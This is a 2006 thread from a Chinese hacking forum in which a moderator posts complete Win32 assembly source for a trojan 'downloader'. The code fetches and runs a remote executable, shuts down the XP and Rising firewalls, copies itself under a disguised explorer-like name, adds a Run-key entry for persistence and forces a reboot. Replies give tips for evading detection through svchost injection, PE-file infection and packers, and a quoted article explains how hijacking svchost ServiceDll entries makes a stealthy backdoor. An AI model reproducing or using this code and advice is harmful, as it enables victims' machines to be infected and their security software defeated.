‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[原创]S.C.T下载者——Win32汇编语言编写

asm

运维管理组

Rank: 7Rank: 7Rank: 7Rank: 7

E.S.T论坛版主

帖子
1674 
精华
31 
积分
9626 
阅读权限
150 
性别
男 
在线时间
984 小时 
注册时间
2006-9-21 
最后登录
2009-1-7 
楼主 发表于 2006-10-19 14:54  只看该作者

[原创]S.C.T下载者——Win32汇编语言编写

文章作者:asm
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

说明:听说插入explorer.exe可以过防火墙,不过不过菜鸟自有菜方法,文中关闭防火墙的办法很愚蠢,但也原创  :)

   之前,牛人挂马是直接用鸽子.在"弹框"的那个时代,谁都知道一个"帮助"的框就好比一个恶魔,谈"框"色变,所以,人就变得聪明起来,这个"框"还没弹出来,就先把浏览器给关了.一些网马生成器利用IE某些漏洞生出来的网马,要等到IE把它执行完毕的时候,鸽子才能悄悄的潜伏到系统里,因为那个该死的"框",在鸽子还没高飞的时候,就被无情的扼杀.这个时候,就需要一个中间的媒介,利用同样的道理生产出来的网马,在IE执行的时候,由于这个媒介体积小,所以很快就执行完毕.当然,如果这个媒介就这样乖乖得好比未出门的少女,那它就要遭到淘汰.它应该有在后台悄悄地下载并且执行我们预定的鸽子,所以,下载者就呼之欲出.
  下载者,顾名思义,就首先要解决下载的困难,下面我给出代码:
复制内容到剪贴板
代码:
include    urlmon.inc
includelib  urlmon.lib
.data
szURL    db '[url]http://www.baidu.com/muma.exe[/url]',0
szSaveFile db 'C:\muma.exe;,0
szUrlmon  db "urlmon.dll",0
invoke LoadLibrary,offset szUrlmon
invoke URLDownloadToFile,NULL,addr szURL,addr szSaveFile,NULL,NULL
其中,szURL是要下载的木马,这里我用百度,不是真的要从百度下载木马,只是一个例子,szSaveFile是下载并且保存到C盘.单单就下载一个程序,那么它只是个废物,还必须要自己执行这个木马,我们的目的才能达到,下面代码将悄悄地运行:
复制内容到剪贴板
代码:
invoke ShellExecute,0,0,addr szSaveFile,0,0,SW_SHOW
现在,我们已经完成了最基本的下载者特征了.
     就目前而言,一些防火墙开始了革命.以前,防火墙只对外部的数据进行检测,但是现在内部不授权的网络连接也要提示用户.从用户的角度来看,这个是个聪明的创造,但是养鸡的却是讨厌到了底边,所以我们有必要弄死它.首先来解决XP自带的防火墙,由于本人的水平半斤八两,只能靠DOS命令来完成,代码如下:
复制内容到剪贴板
代码:
_CloseXP proc
   invoke   GetStartupInfo,addr stStartUp
   invoke   CreateProcess,NULL,addr szCmdLine,NULL,NULL,NULL,\
   NORMAL_PRIORITY_CLASS,NULL,NULL,\
          addr stStartUp,addr  stProcInfo
_CloseXP endp
其中addr szCmdLine就是刷业务的人最熟悉的那个刷QQ业务的停止XP防火墙的命令"net stop sharedaccess",是不是有点故人相识的感觉 :) 在调用之前,首先要定义它:
复制内容到剪贴板
代码:
.data?
stStartUp        STARTUPINFO      <?>
stProcInfo      PROCESS_INFORMATION    <?>
就好比打仗之前,总得磨枪吧?下面就轮到我们的*星防火墙了,首先,程序会去读取它在注册表的默认位置,如果没发现,就下载;如果发现了*星防火墙的味道,马上改写它键值"start"的数据值为"4",表示禁止,然后复制下载者到C盘,写入注册表启动,重启它的机器.重启完毕,会重新读取,这个时候就没发现了防火墙,可以大胆下载了,代码:
复制内容到剪贴板
代码:
_ruixing proc
  LOCAL hKey    :DWORD
  LOCAL BufSize  :DWORD
   local   @hKey,@dwIndex,@dwLastTime:FILETIME
    invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE,addr szRegKeyRfwService,NULL, KEY_QUERY_VALUE,addr hKey
    .if   eax == ERROR_SUCCESS
    invoke RegQueryValueEx,hKey,addr szRfwService,NULL,NULL,addr szStr1,addr BufSize
    .if eax == ERROR_SUCCESS
    call _Download
    invoke DeleteFile,addr szWin
    .elseif eax != ERROR_SUCCESS
    call _CloseToo
    .endif
    .endif
    ret
_ruixing endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;下面这段代码是重启机器
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_CloseRfwService proc
    invoke   GetStartupInfo,addr stStartUp
    invoke   CreateProcess,NULL,addr szShutDown,NULL,NULL,NULL,\
      NORMAL_PRIORITY_CLASS,NULL,NULL,addr stStartUp,addr stProcInfo
_CloseRfwService endp
现在,我们的下载者已经完成了%60,再加入一些自我删除的代码,完整的下载者就写出来了.下面我给出全部源代码:
复制内容到剪贴板
代码:
.386
.model flat, stdcall
option casemap :none
include      windows.inc
include      user32.inc
include       urlmon.inc
include      kernel32.inc
include      advapi32.inc
include       shell32.inc
includelib       user32.lib
includelib     urlmon.lib
includelib       kernel32.lib
includelib       advapi32.lib
includelib     shell32.lib


.data
szRegKeyXP           db      &#39;SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile&#39;,0
szKeyXP            db   &#39;DoNotAllowExceptions&#39;,0
szFileKey          dd 0
szCmdLine          db &#39;net stop sharedaccess&#39;,0
szRegKeyRfwService    db &#39;SYSTEM\CurrentControlSet\Services\RfwService&#39;,0
szRfwService        db &#39;start&#39;,0
szURL             db "[url]http://www.baidu.com/muma.exe[/url]",0
szSaveFile          db &#39;C:\muma.exe&#39;,0
szStr1        dd   4 ;数据
szShutDown          db &#39;shutdown -t 10&#39;,0
szDirectory         db ?
szWin             db &#39;C:\exp1orer.exe&#39;,0
szStaetReg          db &#39;C:\exp1orer.exe&#39;,0
szRegKey           db &#39;SOFTWARE\Microsoft\Windows\CurrentVersion\Run&#39;,0
szUrlmon           db "urlmon.dll",0
.data?
hInstance  dd ?
hModule    dd ?
stStartUp   STARTUPINFO      <?>
stProcInfo   PROCESS_INFORMATION   <?>
osVersion  OSVERSIONINFO <?>
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;关闭XP默认防火墙
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_CloseXPnetWork   proc   _lpKey
  LOCAL hKey    :DWORD
  LOCAL BufSize  :DWORD
   local   @hKey,@dwIndex,@dwLastTime:FILETIME
    invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,addr szRegKeyXP,NULL, KEY_QUERY_VALUE,addr hKey
    .if   eax == ERROR_SUCCESS
    invoke RegQueryValueEx,hKey,addr szKeyXP,NULL,NULL,szFileKey,addr BufSize
    .if eax == ERROR_SUCCESS
       call _CloseXP
       call _Download
      .elseif
      call _ruixing
    invoke   RegCloseKey,@hKey
   .endif
   .endif
   ret
_CloseXPnetWork  endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;判断是否安装瑞星防火墙
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ruixing proc
  LOCAL hKey    :DWORD
  LOCAL BufSize  :DWORD
   local   @hKey,@dwIndex,@dwLastTime:FILETIME
    invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE,addr szRegKeyRfwService,NULL, KEY_QUERY_VALUE,addr hKey
    .if   eax == ERROR_SUCCESS
    invoke RegQueryValueEx,hKey,addr szRfwService,NULL,NULL,addr szStr1,addr BufSize
    .if eax == ERROR_SUCCESS
    call _Download
    invoke DeleteFile,addr szWin
    .elseif eax != ERROR_SUCCESS
    call _CloseToo
    .endif
    .endif
    ret
_ruixing endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;开始关闭XP自带防火墙
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_CloseXP proc
    invoke   GetStartupInfo,addr stStartUp
    invoke   CreateProcess,NULL,addr szCmdLine,NULL,NULL,NULL,\
      NORMAL_PRIORITY_CLASS,NULL,NULL,addr stStartUp,addr stProcInfo
_CloseXP endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;重启计算机
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_CloseRfwService proc
    invoke   GetStartupInfo,addr stStartUp
    invoke   CreateProcess,NULL,addr szShutDown,NULL,NULL,NULL,\
      NORMAL_PRIORITY_CLASS,NULL,NULL,addr stStartUp,addr stProcInfo
_CloseRfwService endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;关闭瑞星防火墙后下载
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Download proc
invoke LoadLibrary,offset szUrlmon
invoke URLDownloadToFile,NULL,addr szURL,addr szSaveFile,NULL,NULL
invoke ShellExecute,0,0,addr szSaveFile,0,0,SW_SHOW
invoke ExitThread,0
_Download endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;关闭瑞星后写进注册表,启动完毕执行下载
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_CreateKey  proc  _lpKey
  local  @hKey,@dwIndex,@dwLastTime:FILETIME
  
  invoke  RegCreateKey,HKEY_LOCAL_MACHINE,offset szRegKey,addr @hKey
  .if  eax == ERROR_SUCCESS
  invoke  RegSetValueEx,@hKey,addr szRegKey,NULL,\
       REG_SZ,addr szStaetReg,32
  invoke  RegCloseKey,@hKey
  .endif
  ret
_CreateKey    endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;关闭瑞星后设置为启动,复制自身到预定目录
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_CloseToo   proc   _lpKey
   LOCAL hKey   :DWORD
  LOCAL BufSize  :DWORD
   local   @hKey,@dwIndex,@dwLastTime:FILETIME
invoke   RegCreateKey,HKEY_LOCAL_MACHINE,addr szRegKey,addr @hKey
    .if   eax == ERROR_SUCCESS
   invoke   RegSetValueEx,@hKey,addr szRfwService,NULL,\
           REG_DWORD,addr szStr1,4      
   invoke   RegCloseKey,@hKey
  invoke GetModuleFileName,hModule,addr szDirectory,200;
  invoke CopyFile,addr szDirectory,addr szWin,FALSE
   call _CreateKey
   .endif
    invoke   GetStartupInfo,addr stStartUp
    invoke   CreateProcess,NULL,addr szShutDown,NULL,NULL,NULL,\
      NORMAL_PRIORITY_CLASS,NULL,NULL,addr stStartUp,addr stProcInfo
   ret   
_CloseToo      endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;判断本机是否开启XP防火墙
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_DWORD   proc   _lpKey
   LOCAL hKey   :DWORD
  LOCAL BufSize  :DWORD
   local   @hKey,@dwIndex,@dwLastTime:FILETIME
   invoke RegOpenKeyEx, HKEY_LOCAL_MACHINE,addr szRegKeyXP,NULL, KEY_QUERY_VALUE,addr hKey
    .if   eax == ERROR_SUCCESS
    invoke RegQueryValueEx,hKey,addr szKeyXP,NULL,NULL,szStr1,addr BufSize
    .if eax != ERROR_SUCCESS
    call _Download
    .elseif
    invoke _CloseXPnetWork,NULL
   .endif
   .endif
_DWORD endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
   invoke  GetModuleHandle,0
   mov  hInstance,eax
   call _DWORD
   invoke ExitProcess,NULL
end start
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
这个代码仅仅测试了没有XP防火墙能正常下载运行外,其他的有XP防火墙和瑞星防火墙的未曾测试,因为没有找到人帮忙,如果测试没有通过的朋友,可以告诉我,我想如果人品没问题的话,估计可以通过 :)
游戏吧  http://www.game8.cc/MyBlog    http://www.asm32.cn

TOP

抗战二十年

晶莹剔透§烈日灼然

Rank: 1

帖子
30 
精华
0 
积分
68 
阅读权限
40 
性别
男 
在线时间
31 小时 
注册时间
2006-10-11 
最后登录
2008-4-26 
沙发 发表于 2006-10-29 16:48  只看该作者
作者的命题我初一看 以为是 S.C.T的下载者 小工具 中 有埋伏,以为是S.C.T下载者插了后门什么的  呵呵~建议作者把命题改一下吧~ [s:36]
不经风雨,怎见彩虹?

TOP

永恒的沙加

晶莹剔透§烈日灼然

Rank: 1

帖子
19 
精华
0 
积分
66 
阅读权限
40 
性别
男 
在线时间
57 小时 
注册时间
2006-8-19 
最后登录
2007-8-5 
椅子 发表于 2006-10-30 01:25  只看该作者
个人意见:关防火墙关杀毒软件的方法不可取。

       防火墙,杀毒软件无缘无故被关掉,对方不可能不察觉。

       我们要做的不是和一个坐在计算机面前的人真刀真枪的干。

       你把人家弄急了,最多重装系统。

       我们要的是杀人于无形。

对于插入进程再说两句:
       本人认为插入explorer.exe或者IE.exe并不好

       有的防火墙仍然会拦截。

       因为这两个程序一般情况并不会自动连接网络。

       最好插入svchost.exe.基本还没遇到过不了的防火墙

       同时替换掉一个通过加载svchost.exe运行的服务。

       这种服务在服务启动里有很多。

TOP

asm

运维管理组

Rank: 7Rank: 7Rank: 7Rank: 7

E.S.T论坛版主

帖子
1674 
精华
31 
积分
9626 
阅读权限
150 
性别
男 
在线时间
984 小时 
注册时间
2006-9-21 
最后登录
2009-1-7 
板凳 发表于 2006-10-30 02:00  只看该作者
插入svchost.exe,这个在研究当中,估计先获取函数地址,然后用GetWindowThreadProcessId和OpenProcess打开操作,然后远程注入..........

谢谢朋友的提醒.... [s:46]
游戏吧  http://www.game8.cc/MyBlog    http://www.asm32.cn

TOP

gyzy

技术核心组

Rank: 8Rank: 8

E.S.T核心成员

帖子
163 
精华
26 
积分
5252 
阅读权限
200 
性别
男 
在线时间
390 小时 
注册时间
2005-7-2 
最后登录
2009-1-9 

原创技术奖 技术活跃奖 软件研发奖

地板 发表于 2006-11-16 23:25  只看该作者
楼主汇编功力不错,支持一下,思路也不错,但主动关闭防火墙总不是太好的办法,很容易暴露自己,最好还是能完全穿透防火墙,特别是现在的主动防御软件:比如KIS6.0,ZoneAlarm。一种思路就是寻找它们的疏忽之处(智者千虑,必有一失嘛),况且为了友好,某些方面不太可能做的太绝。另外一种方法就是代码寄生,推荐这种方法,一般的防火墙几乎不太可能拦住

TOP

asm

运维管理组

Rank: 7Rank: 7Rank: 7Rank: 7

E.S.T论坛版主

帖子
1674 
精华
31 
积分
9626 
阅读权限
150 
性别
男 
在线时间
984 小时 
注册时间
2006-9-21 
最后登录
2009-1-7 
6楼 发表于 2006-11-17 10:19  只看该作者
引用:
另外一种方法就是代码寄生,推荐这种方法,一般的防火墙几乎不太可能拦住
代码寄生?这个可是新词...是不是类似感染,把代码插进程序空隙一样?

我有个设想,就是如果感染杀毒软件主程序本身,行不行得通? [s:73]  [s:66]
游戏吧  http://www.game8.cc/MyBlog    http://www.asm32.cn

TOP

ZV

荣誉会员

Rank: 6Rank: 6Rank: 6

E.S.T论坛贵宾

帖子
464 
精华
10 
积分
4786 
阅读权限
100 
性别
男 
来自
福建福州 
在线时间
105 小时 
注册时间
2004-12-10 
最后登录
2008-1-10 
7楼 发表于 2006-11-17 11:36  只看该作者
沙迦说的应该就是bingle前几年写的一篇<<创建SvcHost.exe调用的服务原理与实践>>.安焦给ddos了,搜索一下应该得到.
流氓会武术,谁都挡不住. http://hi.baidu.com/zvrop

TOP

remax

晶莹剔透§烈日灼然

Rank: 1

帖子
324 
精华
2 
积分
907 
阅读权限
50 
在线时间
79 小时 
注册时间
2005-10-25 
最后登录
2008-7-13 
8楼 发表于 2006-11-17 12:42  只看该作者
发现gyzy最近上bbs勤快多了,代码寄生是什么,同学解释一下~
20字节够写什么?

TOP

gyzy

技术核心组

Rank: 8Rank: 8

E.S.T核心成员

帖子
163 
精华
26 
积分
5252 
阅读权限
200 
性别
男 
在线时间
390 小时 
注册时间
2005-7-2 
最后登录
2009-1-9 

原创技术奖 技术活跃奖 软件研发奖

9楼 发表于 2006-11-17 23:14  只看该作者
引用:
引用第6楼asm2006-11-17 10:19发表的:



代码寄生?这个可是新词...是不是类似感染,把代码插进程序空隙一样?

.......
嗯,我在博客中提到过了这种方法,就是感染PE文件来实现代码寄生,比如感染绝对可信的进程Svchost.exe,但是感染PE文件需要特别注意一些细节,宿主程序的功能不能被破坏是起码的要求。不增加文件大小就已经相当隐蔽了,这算是病毒和后门融合的一个典型例子,这种方法特别适合小型的下载者,稍复杂的后门就不大现实了,现在的HIPS越来越强,我个人觉得这是以后Malware的一个发展趋势,据说某流氓软件也开始用PE感染了。至于楼主所说的感染杀毒软件本身我不太赞成,像卡巴KIS对自身的保护就很周全,还是感染系统文件比较稳妥

TOP

asm

运维管理组

Rank: 7Rank: 7Rank: 7Rank: 7

E.S.T论坛版主

帖子
1674 
精华
31 
积分
9626 
阅读权限
150 
性别
男 
在线时间
984 小时 
注册时间
2006-9-21 
最后登录
2009-1-7 
10楼 发表于 2006-11-18 00:45  只看该作者
已经成功注入exeplorer.exe

http://forum.eviloctal.com/read-htm-tid-26092.html


利用了FindWindow找窗口类
游戏吧  http://www.game8.cc/MyBlog    http://www.asm32.cn

TOP

justcrack

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
40 
精华
0 
积分
196804 
阅读权限
100 
在线时间
86 小时 
注册时间
2006-2-2 
最后登录
2008-2-21 
11楼 发表于 2006-11-21 05:57  只看该作者
引用:
引用第9楼asm2006-11-18 00:45发表的:
已经成功注入exeplorer.exe

http://forum.eviloctal.com/read-htm-tid-26092.html


.......
有个偷懒的办法。生成完用ntpacker压缩下,有inject into other process的 [s:92]
广告位招租。

TOP

icexiaoye

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
733 
精华
4 
积分
5277 
阅读权限
100 
性别
男 
在线时间
256 小时 
注册时间
2006-8-7 
最后登录
2008-12-5 
12楼 发表于 2006-12-7 00:49  只看该作者
引用:
引用第6楼ZV2006-11-17 11:36发表的:
沙迦说的应该就是bingle前几年写的一篇<<创建SvcHost.exe调用的服务原理与实践>>.安焦给ddos了,搜索一下应该得到.
创建SvcHost.exe调用的服务原理与实践
by bingle_at_email.com.cn
www.BingleSite.net


1. 多个服务共享一个Svchost.exe进程利与弊

windows 系统服务分为独立进程和共享进程两种,在windows
NT时只有服务器管理器SCM(Services.exe)有多个共享服务,随着系统内置服务的增加,在windows
2000中ms又把很多服务做成共享方式,由svchost.exe启动。windows 2000一般有2个svchost进程,一个是RPCSS(Remote
Procedure Call)服务进程,另外一个则是由很多服务共享的一个svchost.exe。而在windows
XP中,则一般有4个以上的svchost.exe服务进程,windows 2003
server 中则更多,可以看出把更多的系统内置服务以共享进程方式由svchost启动是ms的一个趋势。这样做在一定程度上减少了系统资源的消耗,不过也带来一定的不稳定因素,因为任何一个共享进程的服务因为错误退出进程就会导致整个进程中的所有服务都退出。另外就是有一点安全隐患,首先要介绍一下 svchost.exe的实现机制。


2. Svchost原理

Svchost本身只是作为服务宿主,并不实现任何服务功能,需要Svchost启动的服务以动态链接库形式实现,在安装这些服务时,把服务的可执行程序指向svchost,启动这些服务时由svchost调用相应服务的动态链接库来启动服务。

那么svchost如何知道某一服务是由哪个动态链接库负责呢?这不是由服务的可执行程序路径中的参数部分提供的,而是服务在注册表中的参数设置的,注册表中服务下边有一个Parameters子键其中的ServiceDll表明该服务由哪个动态链接库负责。并且所有这些服务动态链接库都必须要导出一个 ServiceMain()函数,用来处理服务任务。

例如rpcss(Remote Procedure Call)在注册表中的位置是
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRpcSs,它的参数子键Parameters里有这样一项:
"ServiceDll"=REG_EXPAND_SZ:"%SystemRoot%system32 pcss.dll"
当启动rpcss服务时,svchost就会调用rpcss.dll,并且执行其ServiceMain()函数执行具体服务。

既然这些服务是使用共享进程方式由svchost启动的,为什么系统中会有多个svchost进程呢?ms把这些服务分为几组,同组服务共享一个svchost进程,不同组服务使用多个svchost进程,组的区别是由服务的可执行程序后边的参数决定的。

例如rpcss在注册表中 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesRpcSs 有这样一项:
"ImagePath"=REG_EXPAND_SZ:"%SystemRoot%system32svchost -k rpcss"
因此rpcss就属于rpcss组,这在服务管理控制台也可以看到。

svchost的所有组和组内的所有服务都在注册表的如下位置: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionSvchost,例如windows
2000共有4组rpcss、netsvcs、wugroup、BITSgroup,其中最多的就是netsvcs=REG_MULTI_SZ:EventSystem.Ias.Iprip.Irmon.Netman.Nwsapagent.Rasauto.
Rasman.Remoteaccess.SENS.Sharedaccess.Tapisrv.Ntmssvc.wzcsvc..

在启动一个svchost.exe负责的服务时,服务管理器如果遇到可执行程序内容ImagePath已经存在于服务管理器的映象库中,就不在启动第2个进程svchost,而是直接启动服务。这样就实现了多个服务共享一个svchost进程。


3. Svchost代码

现在我们基本清楚svchost的原理了,但是要自己写一个DLL形式的服务,由svchost来启动,仅有上边的信息还有些问题不是很清楚。比如我们在导出的ServiceMain()函数中接收的参数是ANSI还是Unicode?我们是否需要调用RegisterServiceCtrlHandler 和StartServiceCtrlDispatcher来注册服务控制及调度函数?

这些问题要通过查看svchost代码获得。下边的代码是windows 2000+ service pack 4
的svchost反汇编片段,可以看出svchost程序还是很简单的。

主函数首先调用ProcCommandLine()对命令行进行分析,获得要启动的服务组,然后调用SvcHostOptions()查询该服务组的选项和服务组的所有服务,并使用一个数据结构
svcTable 来保存这些服务及其服务的DLL,然后调用PrepareSvcTable() 函数创建SERVICE_TABLE_ENTRY
结构,把所有处理函数SERVICE_MAIN_FUNCTION 指向自己的一个函数FuncServiceMain(),最后调用API
StartServiceCtrlDispatcher() 注册这些服务的调度函数。

; =============================== Main Funcion
===========================================
.text:010010B8 public start
.text:010010B8 start proc near
.text:010010B8 push esi
.text:010010B9 push edi
.text:010010BA push offset sub_1001EBA ; lpTopLevelExceptionFilter
.text:010010BF xor edi, edi
.text:010010C1 call ds:SetUnhandledExceptionFilter
.text:010010C7 push 1 ; uMode
.text:010010C9 call ds:SetErrorMode
.text:010010CF call ds:GetProcessHeap
.text:010010D5 push eax
.text:010010D6 call sub_1001142
.text:010010DB mov eax, offset dword_1003018
.text:010010E0 push offset unk_1003000 ; lpCriticalSection
.text:010010E5 mov dword_100301C, eax
.text:010010EA mov dword_1003018, eax
.text:010010EF call ds:InitializeCriticalSection
.text:010010F5 call ds:GetCommandLineW
.text:010010FB push eax ; lpString
.text:010010FC call ProcCommandLine
.text:01001101 mov esi, eax
.text:01001103 test esi, esi
.text:01001105 jz short lab_doservice
.text:01001107 push esi
.text:01001108 call SvcHostOptions
.text:0100110D call PrepareSvcTable
.text:01001112 mov edi, eax ; SERVICE_TABLE_ENTRY returned
.text:01001114 test edi, edi
.text:01001116 jz short loc_1001128
.text:01001118 mov eax, [esi+10h]
.text:0100111B test eax, eax
.text:0100111D jz short loc_1001128
.text:0100111F push dword ptr [esi+14h] ; dwCapabilities
.text:01001122 push eax ; int
.text:01001123 call InitializeSecurity
.text:01001128
.text:01001128 loc_1001128: ; CODE XREF: start+5Ej
.text:01001128 ; start+65j
.text:01001128 push esi ; lpMem
.text:01001129 call HeapFreeMem
.text:0100112E
.text:0100112E lab_doservice: ; CODE XREF: start+4Dj
.text:0100112E test edi, edi
.text:01001130 jz ExitProgram
.text:01001136 push edi ; lpServiceStartTable
.text:01001137 call ds:StartServiceCtrlDispatcherW
.text:0100113D jmp ExitProgram
.text:0100113D start endp
; =============================== Main Funcion end
===========================================


由于svchost为该组的所有服务都注册了svchost中的一个处理函数,因此每次启动任何一个服务时,服务管理器SCM都会调用FuncServiceMain()
这个函数。这个函数使用 svcTable 查询要启动的服务使用的DLL,调用DLL导出的ServiceMain()函数来启动服务,然后返回。

; ============================== FuncServiceMain()
===========================================
.text:01001504 FuncServiceMain proc near ; DATA XREF: PrepareSvcTable+44o
.text:01001504
.text:01001504 arg_0 = dword ptr 8
.text:01001504 arg_4 = dword ptr 0Ch
.text:01001504
.text:01001504 push ecx
.text:01001505 mov eax, [esp+arg_4]
.text:01001509 push ebx
.text:0100150A push ebp
.text:0100150B push esi
.text:0100150C mov ebx, offset unk_1003000
.text:01001511 push edi
.text:01001512 mov edi, [eax]
.text:01001514 push ebx
.text:01001515 xor ebp, ebp
.text:01001517 call ds:EnterCriticalSection
.text:0100151D xor esi, esi
.text:0100151F cmp dwGroupSize, esi
.text:01001525 jbe short loc_1001566
.text:01001527 and [esp+10h], esi
.text:0100152B
.text:0100152B loc_100152B: ; CODE XREF: FuncServiceMain+4Aj
.text:0100152B mov eax, svcTable
.text:01001530 mov ecx, [esp+10h]
.text:01001534 push dword ptr [eax+ecx]
.text:01001537 push edi
.text:01001538 call ds:lstrcmpiW
.text:0100153E test eax, eax
.text:01001540 jz short StartThis
.text:01001542 add dword ptr [esp+10h], 0Ch
.text:01001547 inc esi
.text:01001548 cmp esi, dwGroupSize
.text:0100154E jb short loc_100152B
.text:01001550 jmp short loc_1001566
.text:01001552 ; =================================================
.text:01001552
.text:01001552 StartThis: ; CODE XREF: FuncServiceMain+3Cj
.text:01001552 mov ecx, svcTable
.text:01001558 lea eax, [esi+esi*2]
.text:0100155B lea eax, [ecx+eax*4]
.text:0100155E push eax
.text:0100155F call GetDLLServiceMain
.text:01001564 mov ebp, eax ; dll ServiceMain Function address
.text:01001566
.text:01001566 loc_1001566: ; CODE XREF: FuncServiceMain+21j
.text:01001566 ; FuncServiceMain+4Cj
.text:01001566 push ebx
.text:01001567 call ds:LeaveCriticalSection
.text:0100156D test ebp, ebp
.text:0100156F jz short loc_100157B
.text:01001571 push [esp+10h+arg_4]
.text:01001575 push [esp+14h+arg_0]
.text:01001579 call ebp
.text:0100157B
.text:0100157B loc_100157B: ; CODE XREF: FuncServiceMain+6Bj
.text:0100157B pop edi
.text:0100157C pop esi
.text:0100157D pop ebp
.text:0100157E pop ebx
.text:0100157F pop ecx
.text:01001580 retn 8
.text:01001580 FuncServiceMain endp ; sp = -8
; ============================== FuncServiceMain() end
========================================


由于svchost已经调用了StartServiceCtrlDispatcher来服务调度函数,因此我们在实现DLL实现时就不用了,这主要是因为一个进程只能调用一次StartServiceCtrlDispatcher
API。但是需要用 RegisterServiceCtrlHandler 来注册响应控制请求的函数。最后我们的DLL接收的都是unicode字符串。

由于这种服务启动后由svchost加载,不增加新的进程,只是svchost的一个DLL,而且一般进行审计时都不会去HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionSvchost 检查服务组是否变化,就算去检查,也不一定能发现异常,因此如果添加一个这样的DLL后门,伪装的好,是比较隐蔽的。


4. 安装服务与设置
要通过svchost调用来启动的服务,就一定要在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionSvchost下有该服务名,这可以通过如下方式来实现:
1) 添加一个新的服务组,在组里添加服务名
2) 在现有组里添加服务名
3) 直接使用现有服务组里的一个服务名,但本机没有安装的服务
4) 修改现有服务组里的现有服务,把它的ServiceDll指向自己

其中前两种可以被正常服务使用,如使用第1种方式,启动其服务要创建新的svchost进程;第2种方式如果该组服务已经运行,安装后不能立刻启动服务,因为svchost启动后已经把该组信息保存在内存里,并调用API
StartServiceCtrlDispatcher()
为该组所有服务注册了调度处理函数,新增加的服务不能再注册调度处理函数,需要重起计算机或者该组的svchost进程。而后两种可能被后门使用,尤其是最后一种,没有添加服务,只是改了注册表里一项设置,从服务管理控制台又看不出来,如果作为后门还是很隐蔽的。比如EventSystem服务,缺省是指向 es.dll,如果把ServiceDll改为EventSystem.dll就很难发现。

因此服务的安装除了调用CreateService()创建服务之外,还需要设置服务的ServiceDll,如果使用前2种还要设置svchost的注册表选项,在卸载时也最好删除增加的部分。

具体代码参见后边的附例(使用的是方法3)。

注: ImagePath 和ServiceDll 是ExpandString不是普通字符串。因此如果使用.reg文件安装时要注意。


5. DLL服务实现
DLL程序的编写比较简单,只要实现一个ServiceMain()函数和一个服务控制程序,在ServiceMain()函数里用RegisterServiceCtrlHandler()注册服务控制程序,并设置服务的运行状态就可以了。

另外,因为此种服务的安装除了正常的CreateService()之外,还要进行其他设置,因此最好实现安装和卸载函数。

为了方便安装,实现的代码提供了InstallService()函数进行安装,这个函数可以接收服务名作为参数(如果不提供参数,就使用缺省的 iprip),如果要安装的服务不在svchost的netsvcs组里安装就会失败;如果要安装的服务已经存在,安装也会失败;安装成功后程序会配置服务的ServiceDll为当前Dll。提供的UninstallService()函数,可以删除任何函数而没有进行任何检查。

为了方便使用rundll32.exe进行安装,还提供了RundllInstallA()和RundllUninstallA()分别调用InstallService()及UninstallService()。因为rundll32.exe使用的函数原型是:
void CALLBACK FunctionName(
HWND hwnd, // handle to owner window
HINSTANCE hinst, // instance handle for the DLL
LPTSTR lpCmdLine, // string the DLL will parse
int nCmdShow // show state
);
对应的命令行是rundll32 DllName,FunctionName [Arguments]

